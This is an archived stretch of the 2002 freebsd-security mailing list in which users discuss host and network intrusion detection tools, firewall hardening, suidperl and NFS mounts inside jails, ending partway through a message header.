From owner-freebsd-security Sun Jan 13 9:55:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.hccnet.nl (smtp.hccnet.nl [62.251.0.13]) by hub.freebsd.org (Postfix) with ESMTP id 3B52837B402 for ; Sun, 13 Jan 2002 09:55:32 -0800 (PST) Received: from there by smtp.hccnet.nl via fia168-94.dsl.hccnet.nl [62.251.94.168] with SMTP for id SAA05886 (8.8.8/1.13); Sun, 13 Jan 2002 18:55:16 +0100 (MET) Message-Id: <200201131755.SAA05886@smtp.hccnet.nl> Content-Type: text/plain; charset="iso-8859-1" From: Simon Siemonsma To: freebsd-security@freebsd.org Subject: Which intrusion detection to use? Date: Sun, 13 Jan 2002 19:00:30 +0000 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have a FreeBSD box at home which I primairily use for internet access. All unneccesary deamon's are switched of (I have inetd turned off) and I make use of IPFW. To even increase the security more I want to add a few things: 1. software that warns me when I'm under attack. I understood snort is a Network based Intrusion Detection System (NIDS), so not usefull on a host. What are the alternatives on a host? I did read about portsentry but don't understand what the added benefit it over a tightly configured firewall. I mean I use statefull packet filtering, allowing connections to be build up from me to the internet and not the other way round. Further my ports are stealthed. 2. software which will detect that I'm hacked. Tripware is a well know name, but AIDE clames to do more. Integrit claimes to be simpler and focus on the essentials. Does anyone have some recommendations for me. Other recommendations to increase my security are also welcome? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 13 10:38:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id 0B83B37B41A for ; Sun, 13 Jan 2002 10:38:39 -0800 (PST) Received: from DAVE ([192.168.0.56]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id g0DIcEF09944; Sun, 13 Jan 2002 20:38:15 +0200 (SAST) (envelope-from dave@raven.za.net) Message-ID: <019601c19c61$121dfb00$3800a8c0@DAVE> From: "Dave Raven" To: "Simon Siemonsma" , References: <200201131755.SAA05886@smtp.hccnet.nl> Subject: Re: Which intrusion detection to use? Date: Sun, 13 Jan 2002 20:35:25 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Snort is probably what your looking for. I wouldnt recommend running portsentry as it can lead to fairly dangerous DoS. Tripwire and AIDE are good products; read up on them to decide. I think youre going overboard. If you default deny anything in and have no unsafe things running what are you worried about? just tail -f your firewall logs. ----- Original Message ----- From: "Simon Siemonsma" To: Sent: Sunday, January 13, 2002 9:00 PM Subject: Which intrusion detection to use? > I have a FreeBSD box at home which I primairily use for internet access. > All unneccesary deamon's are switched of (I have inetd turned off) and I make > use of IPFW. > To even increase the security more I want to add a few things: > 1. software that warns me when I'm under attack. I understood snort is a > Network based Intrusion Detection System (NIDS), so not usefull on a host. > What are the alternatives on a host? I did read about portsentry but don't > understand what the added benefit it over a tightly configured firewall. I > mean I use statefull packet filtering, allowing connections to be build up > from me to the internet and not the other way round. Further my ports are > stealthed. > 2. software which will detect that I'm hacked. Tripware is a well know name, > but AIDE clames to do more. Integrit claimes to be simpler and focus on the > essentials. > > Does anyone have some recommendations for me. > Other recommendations to increase my security are also welcome? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 13 11:34:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 90B6E37B417 for ; Sun, 13 Jan 2002 11:34:05 -0800 (PST) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g0DJR1l72286; Sun, 13 Jan 2002 13:27:01 -0600 (CST) (envelope-from admin@crimelords.org) Date: Sun, 13 Jan 2002 13:27:01 -0600 (CST) From: admin To: Simon Siemonsma Cc: freebsd-security@FreeBSD.ORG Subject: Re: Which intrusion detection to use? In-Reply-To: <200201131755.SAA05886@smtp.hccnet.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Check out Veracity...I use snort and aide and tripwire on different machines, and Veracity has peeked my interest just lately due to a post from here. I will be giving it a trial run myself pretty soon. Here is where you can find it.... Have a look at http://www.freeveracity.org Let us know if you do use it, it's supposed to work very well on bsd. --emacs On Sun, 13 Jan 2002, Simon Siemonsma wrote: > I have a FreeBSD box at home which I primairily use for internet access. > All unneccesary deamon's are switched of (I have inetd turned off) and I make > use of IPFW. > To even increase the security more I want to add a few things: > 1. software that warns me when I'm under attack. I understood snort is a > Network based Intrusion Detection System (NIDS), so not usefull on a host. > What are the alternatives on a host? I did read about portsentry but don't > understand what the added benefit it over a tightly configured firewall. I > mean I use statefull packet filtering, allowing connections to be build up > from me to the internet and not the other way round. Further my ports are > stealthed. > 2. software which will detect that I'm hacked. Tripware is a well know name, > but AIDE clames to do more. Integrit claimes to be simpler and focus on the > essentials. > > Does anyone have some recommendations for me. > Other recommendations to increase my security are also welcome? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 13 12: 8:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id A279337B417 for ; Sun, 13 Jan 2002 12:08:26 -0800 (PST) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id B22861DA7; Sun, 13 Jan 2002 21:08:21 +0100 (CET) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [127.0.0.1]) by velvet.zaraska.dhs.org (8.11.2/8.11.2) with SMTP id g0DK89r01049; Sun, 13 Jan 2002 21:08:09 +0100 Date: Sun, 13 Jan 2002 21:08:09 +0100 From: Krzysztof Zaraska To: freebsd-security@freebsd.org Subject: Re: Which intrusion detection to use? Message-Id: <20020113210809.6be9f991.kzaraska@student.uci.agh.edu.pl> Organization: University Of Mining And Metallurgy X-Mailer: Sylpheed version 0.6.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 13 Jan 2002 19:00:30 +0000 Simon Siemonsma wrote: > I have a FreeBSD box at home which I primairily use for internet access. > All unneccesary deamon's are switched of (I have inetd turned off) and I make > use of IPFW. > To even increase the security more I want to add a few things: > 1. software that warns me when I'm under attack. I understood snort is a > Network based Intrusion Detection System (NIDS), so not usefull on a host. Wrong. This term simply means that it will sniff your network (i.e. connection to your ISP) and alert you when it sees a packet that matches known attack signature. So yes, you can run it on single host. Be warned, however, that Snort can generate false positives: e.g. it can report that you are being exploited with unknown exploit while FTP'ing a new release of FreeBSD, because some archives have strings of 0x70's in them what triggers alert. > What are the alternatives on a host? To clean up terminology: a host-based IDS is AIDE, since it monitors changes on host. Snort is network-based since it monitors network. A hybrid IDS monitors both. > I did read about portsentry but don't > understand what the added benefit it over a tightly configured firewall. I don't know how tight your particular setup is, but if you deny access to all unused ports to the world there will be no use in PortSentry since the offending packets will never his the port PortSentry is listening on. Snort does not care about firewalls, so just tell it to listen on outside interface and you're set. > I > mean I use statefull packet filtering, allowing connections to be build up > from me to the internet and not the other way round. You mean you have no services available from outside? Well, duh, not much can be hacked here anyhow, unless there is some exploit for the kernel we don't know of I guess... > Further my ports are > stealthed. This doubles the functionality of the firewall, but may be useful if you switch your firewall off for debugging etc. A nice example of 'layer security'. :) > 2. software which will detect that I'm hacked. Tripware is a well know name, > but AIDE clames to do more. Personally I use AIDE and I find it to be quite OK. After setting up AIDE I made an MD5 checksum of the database. I keep this checksum offsite and compare it against the current checksum to be sure that no one tampered with database :) > Integrit claimes to be simpler and focus on the > essentials. Haven't tested. However all these tools operate on the same principles... > Does anyone have some recommendations for me. If this is a NAT gateway that has all ports firewalled from the outside I'd be satisified with the steps described above. Just re-check your firewall rules, since it's your most important line of defense. You may however (it's your system, anyhow ;-)) consider raising your securelevel and making some files immutable (binaries, configuration) and some other append-only (logs). man securelevel for details. > Other recommendations to increase my security are also welcome? Well, there are some papers on the subject available on the net, so just do a Google search :) but they mostly focus on multi-user systems and servers. Actually simple setup == less possible points of entry. I'm afraid that if you exagerrate you may end up with a system generating tons of logs although nothing serious is happening. Best regards, Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 13 16:37:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail001.ifxwh.com.br (mail001.ifxwh.com.br [200.201.133.10]) by hub.freebsd.org (Postfix) with SMTP id C3DE537B416 for ; Sun, 13 Jan 2002 16:37:20 -0800 (PST) Received: (qmail 25016 invoked from network); 14 Jan 2002 00:37:16 -0000 Received: from unknown (HELO andre) (200.191.221.62) by 0 with SMTP; 14 Jan 2002 00:37:16 -0000 Message-ID: <01fa01c19c93$72ec5120$09c8a8c0@treinar.com.br> From: =?Windows-1252?Q?Andr=E9_Videira?= To: Subject: Date: Sun, 13 Jan 2002 22:36:03 -0200 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe freebsd-security andre@institutotreinar.com.br To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 13 17:17:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-168.zoominternet.net [24.154.28.168]) by hub.freebsd.org (Postfix) with ESMTP id E4E1537B400 for ; Sun, 13 Jan 2002 17:17:37 -0800 (PST) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.11.6/8.11.6) with ESMTP id g0E1HRG76659 for ; Sun, 13 Jan 2002 20:17:27 -0500 (EST) (envelope-from behanna@zbzoom.net) Date: Sun, 13 Jan 2002 20:17:22 -0500 (EST) From: Chris BeHanna Reply-To: Chris BeHanna To: Subject: Re: smtpproxy In-Reply-To: <20020112005425.GA69702@pc5.abc> Message-ID: <20020113201536.G76617-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 12 Jan 2002, Nicolas Rachinsky wrote: > I'm looking for a smtpproxy or something similar to accept mails via > smtp on the firewall and forward them to the internal sendmail. > > It should be as simple as possible, there would be very low traffic > some mails per day (some mails per hour maximum). And there should no > exploitable bugs, of course ;-) > > I'm looking for such a thing because I don't want to expose the > internal sendmail to the bad outside world. You will lose the anti-spam capabilities of sendmail in the process. To me, those are of considerable value. Others have pointed out postfix, smtpd, smapd, and the like. If you're really hard-up and don't like any of those, then you need to write your own smtpd. In concept it's easy, but getting it tight and secure is the hard part. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net I was raised by a pack of wild corn dogs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 1:27:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id AF96337B405 for ; Mon, 14 Jan 2002 01:27:13 -0800 (PST) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.33 #1) id 16Q3Qi-000Lzg-00; Mon, 14 Jan 2002 11:29:24 +0200 From: Sheldon Hearn To: Rik Cc: freebsd-security@FreeBSD.ORG Subject: Re: suidperl In-reply-to: Your message of "Sun, 13 Jan 2002 00:28:22 GMT." <20020113002822.GA28482@spoon.pkl.net> Date: Mon, 14 Jan 2002 11:29:23 +0200 Message-ID: <84547.1011000563@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, 13 Jan 2002 00:28:22 GMT, Rik wrote: > Which raises the question, what use is suidperl without the suid bit? I > can't recall ever having used it, and I can't recall any scripts I know > of that use it... so, uhm, what's the point? It's provided so that folks don't have to build any software to make it available. They just have to make it setuid root. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 1:37:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 4C39237B422 for ; Mon, 14 Jan 2002 01:37:36 -0800 (PST) Received: (qmail 3626 invoked by uid 1000); 14 Jan 2002 09:37:33 -0000 Date: Mon, 14 Jan 2002 10:37:33 +0100 From: Bart Matthaei To: Rik Cc: freebsd-security@freebsd.org Subject: Re: suidperl Message-ID: <20020114103733.G94021@heresy.dreamflow.nl> References: <077f01c19b41$7cf205a0$6500a8c0@halenet.com.au> <20020112204404.A455@raven.robbins.dropbear.id.au> <20020113002822.GA28482@spoon.pkl.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="gKMricLos+KVdGMg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020113002822.GA28482@spoon.pkl.net>; from freebsd-security@rikrose.net on Sun, Jan 13, 2002 at 12:28:22AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --gKMricLos+KVdGMg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jan 13, 2002 at 12:28:22AM +0000, Rik wrote: > Which raises the question, what use is suidperl without the suid bit? I > can't recall ever having used it, and I can't recall any scripts I know > of that use it... so, uhm, what's the point? It used to be suid on linux distro's. Until some critical vulnerabilities were found. suidperl is useful for maintenance scripts who are called by normal users (or, for instance, the www-user, if the script is called from a webbased maintenance system). Regards, Bart --=20 Bart Matthaei bart@dreamflow.nl=20 "The whacky morning DJ says democracy's a joke" --gKMricLos+KVdGMg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8Qqbdgcc6pR+tCegRAnnSAKC0pjR3n7gU2kf/nlR19qpcESHSGACgvyxV NwnuB6t9UVcK10lRPJnVL6g= =g+P0 -----END PGP SIGNATURE----- --gKMricLos+KVdGMg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 5: 5: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36]) by hub.freebsd.org (Postfix) with ESMTP id 2577F37B419 for ; Mon, 14 Jan 2002 05:05:00 -0800 (PST) Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909) id 38F20107889; Mon, 14 Jan 2002 16:04:56 +0300 (MSK) Date: Mon, 14 Jan 2002 16:04:56 +0300 From: zhuravlev alexander To: security@freebsd.org Subject: jail and NFS Message-ID: <20020114160455.A44661@ulstu.ru> Reply-To: zhuravlev alexander Mail-Followup-To: security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hello is it possible in jailed box mount nfs shares ? thanks. sorry if this is not correct list to post this message. -- zhuravlev alexander u l s t u c t c e-mail:zaa@ulstu.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 6:19:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from spitfire.velocet.net (spitfire.velocet.net [216.138.223.227]) by hub.freebsd.org (Postfix) with ESMTP id 7C57037B405 for ; Mon, 14 Jan 2002 06:19:28 -0800 (PST) Received: from nomad.tor.lets.net (H74.C220.tor.velocet.net [216.138.220.74]) by spitfire.velocet.net (Postfix) with SMTP id D4E8144AA4F for ; Mon, 14 Jan 2002 14:19:26 +0000 (GMT) Received: (qmail 98797 invoked by uid 1001); 14 Jan 2002 14:13:49 -0000 Date: Mon, 14 Jan 2002 09:13:48 -0500 From: Steve Shorter To: zhuravlev alexander Cc: security@freebsd.org Subject: Re: jail and NFS Message-ID: <20020114091348.A98792@nomad.lets.net> References: <20020114160455.A44661@ulstu.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020114160455.A44661@ulstu.ru>; from zaa@ulstu.ru on Mon, Jan 14, 2002 at 04:04:56PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jan 14, 2002 at 04:04:56PM +0300, zhuravlev alexander wrote: > hello > is it possible in jailed box mount nfs shares ? I run apache in a jail with homedir mounted NFS No. Problem. The homedir are visible from the jail but the network the they are mounted across isn't. Cool! -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 6:42:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 082BA37B417 for ; Mon, 14 Jan 2002 06:42:41 -0800 (PST) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.6/8.11.5) with SMTP id g0EEgQD25989; Mon, 14 Jan 2002 09:42:26 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Mon, 14 Jan 2002 09:42:26 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: zhuravlev alexander Cc: security@freebsd.org Subject: Re: jail and NFS In-Reply-To: <20020114160455.A44661@ulstu.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If the NFS mount is visible in the jail's namespace, then the jailed processes can access it subject to normal access control restrictions. However, processes in jail are not permitted to mount, remount, or unmount filesystems, so any access to NFS must be configured by a process outside the jail (and preferably, before any untrusted processes run in the jail, so as to prevent racing and path-based games). Typically, when using NFS with a jail, I'll do the NFS mounting prior to actually starting the jail. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services On Mon, 14 Jan 2002, zhuravlev alexander wrote: > hello > is it possible in jailed box mount nfs shares ? > > thanks. > sorry if this is not correct list to post this message. > > -- > zhuravlev alexander > u l s t u c t c > e-mail:zaa@ulstu.ru > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 6:47: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31]) by hub.freebsd.org (Postfix) with SMTP id CE09037B405 for ; Mon, 14 Jan 2002 06:47:01 -0800 (PST) Received: from unknown (HELO warhawk) (202.1.200.109) by smtp.mail.vip.sc5.yahoo.com with SMTP; 14 Jan 2002 14:46:55 -0000 From: "Haikal Saadh" To: "'Krzysztof Zaraska'" , Subject: RE: Which intrusion detection to use? Date: Mon, 14 Jan 2002 19:46:38 +0500 Message-ID: <004c01c19d0a$4e0cf3b0$6dc801ca@warhawk> X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-reply-to: <20020113210809.6be9f991.kzaraska@student.uci.agh.edu.pl> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org *snip* > I don't know how tight your particular setup is, but if you > deny access to all unused ports to the world there will be no > use in PortSentry since the offending packets will never his > the port PortSentry is listening on. Snort does not care > about firewalls, so just tell it to listen on outside > interface and you're set. > I have been thinking about this a bit lately. I am (was until I broke it this morning upgrading to 1.8.3, blast it!) running snort and ipfw, and while I would get ipfw dropping packets in my logs, I have nothing in my snort alerts from my outside network. (Quite a few from the inside though, mostly malformed NetBIOS packets and other mostly harmless (as far as I'm concerned) traffic). My firewall policy is default deny, but with dynamic rules so that I can actually use stuff. My snort's HOMENET is set to any, and I'm on dialup. What I'd like to someone to clarify for me is: Is snort actually seeing incoming packets on my outside interface, and I've been really lucky so far OR Is snort not hearing anything on my outside interface? (tun0) What you've said above suggests the former, but I would appreciate it if someone confirms my suspicions. *snip* > > > Does anyone have some recommendations for me. > If this is a NAT gateway that has all ports firewalled from > the outside I'd be satisified with the steps described above. > Just re-check your firewall rules, since it's your most > important line of defense. > > You may however (it's your system, anyhow ;-)) consider > raising your securelevel and making some files immutable > (binaries, configuration) and some other append-only (logs). > man securelevel for details. > > > Other recommendations to increase my security are also welcome? If you want a good book I'd recommend "Building Internet Firewalls" by Zwicky et al, published by O'reilly and associates, Also for inspiration, look at: A) /etc/login.access B) /etc/hosts.allow C) /etc/login.conf D) running daemons (like bind,sendmail, and even snort, among others) as their own user/group, and _NOT_ root.wheel. > Well, there are some papers on the subject available on the > net, so just do a Google search :) but they mostly focus on > multi-user systems and servers. Actually simple setup == less > possible points of entry. > > I'm afraid that if you exagerrate you may end up with a > system generating tons of logs although nothing serious is happening. _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 7:27: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 017F737B41A for ; Mon, 14 Jan 2002 07:27:06 -0800 (PST) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with SMTP id A01901DA7; Mon, 14 Jan 2002 16:27:06 +0100 (CET) Date: Mon, 14 Jan 2002 16:26:52 +0100 From: Krzysztof Zaraska To: "Haikal Saadh" Cc: freebsd-security@freebsd.org Subject: Re: Which intrusion detection to use? Message-Id: <20020114162652.7ba2a6d4.kzaraska@student.uci.agh.edu.pl> In-Reply-To: <004c01c19d0a$4e0cf3b0$6dc801ca@warhawk> References: <20020113210809.6be9f991.kzaraska@student.uci.agh.edu.pl> <004c01c19d0a$4e0cf3b0$6dc801ca@warhawk> Organization: Univ. of Mining And Metallurgy X-Mailer: Sylpheed version 0.6.6 (GTK+ 1.2.10; i386--freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 14 Jan 2002 19:46:38 +0500 "Haikal Saadh" wrote: > *snip* > > > I don't know how tight your particular setup is, but if you > > deny access to all unused ports to the world there will be no > > use in PortSentry since the offending packets will never his > > the port PortSentry is listening on. Snort does not care > > about firewalls, so just tell it to listen on outside > > interface and you're set. > > > > I have been thinking about this a bit lately. I am (was until I broke it > this morning upgrading to 1.8.3, blast it!) running snort and ipfw, and > while I would get ipfw dropping packets in my logs, I have nothing in my > snort alerts from my outside network. (Quite a few from the inside > though, mostly malformed NetBIOS packets and other mostly harmless (as > far as I'm concerned) traffic). > > My firewall policy is default deny, but with dynamic rules so that I can > actually use stuff. My snort's HOMENET is set to any, and I'm on dialup. > > > What I'd like to someone to clarify for me is: > Is snort actually seeing incoming packets on my outside interface, and > I've been really lucky so far > OR > Is snort not hearing anything on my outside interface? (tun0) From my experience snort will not catch much in this setup. If you deny anything you are virtually invisible for kiddiez out there. They usually sweep large networks looking for alive hosts and then look closer at those who are alive. But if you deny everything you are a dead host for them. These sweep scans are not detected by snort, since it does not trigger on single SYN or PING packet. And you do not have any services running, so no exploits are tried on you. Snort is libpcap based, so if tcpdump -i tun0 works for you snort should see packets also... There is a simple test: just portscan your box from the remote computer. This should trigger alert. [...] Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 7:30:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id 808E637B419 for ; Mon, 14 Jan 2002 07:30:27 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 16Q93j-0002hg-00; Mon, 14 Jan 2002 15:30:03 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Mon, 14 Jan 2002 15:30:03 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C58516AF7@MAGRAT> From: Lee Brotherston To: 'Haikal Saadh' , 'Krzysztof Zaraska' , freebsd-security@freebsd.org Subject: RE: Which intrusion detection to use? Date: Mon, 14 Jan 2002 15:29:59 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | What I'd like to someone to clarify for me is: | Is snort actually seeing incoming packets on my outside interface, and | I've been really lucky so far | OR | Is snort not hearing anything on my outside interface? (tun0) Have you tried waiting until the dialup connection is established then running snort with: -i tun0 This specifies which interface to listen on. You will of course not see any traffic on your local lan anymore, as it will not be sniffing the interface connected to your hub/switch. It should however pickup the inbound traffic and any local traffic that goes out over the interface. If you want to get paranoid run snort on all interfaces and compare the results :) Normally you need to run an instance per interface, unless you're using a linux 2.1.x/2.2.x kernel. If you are you might want to see http://www.snort.org/docs/faq.html#3.4 Thanks Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 14 8:24:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by hub.freebsd.org (Postfix) with SMTP id B5A6D37B404 for ; Mon, 14 Jan 2002 08:24:27 -0800 (PST) Received: from unknown (HELO warhawk) (202.1.200.64) by smtp.mail.vip.sc5.yahoo.com with SMTP; 14 Jan 2002 16:24:24 -0000 From: "Haikal Saadh" To: "'Lee Brotherston'" , "'Krzysztof Zaraska'" , Subject: RE: Which intrusion detection to use? Date: Mon, 14 Jan 2002 21:24:09 +0500 Message-ID: <000001c19d17$ec59c7c0$40c801ca@warhawk> X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-reply-to: <7052044C7D7AD511A20200508B5A9C58516AF7@MAGRAT> 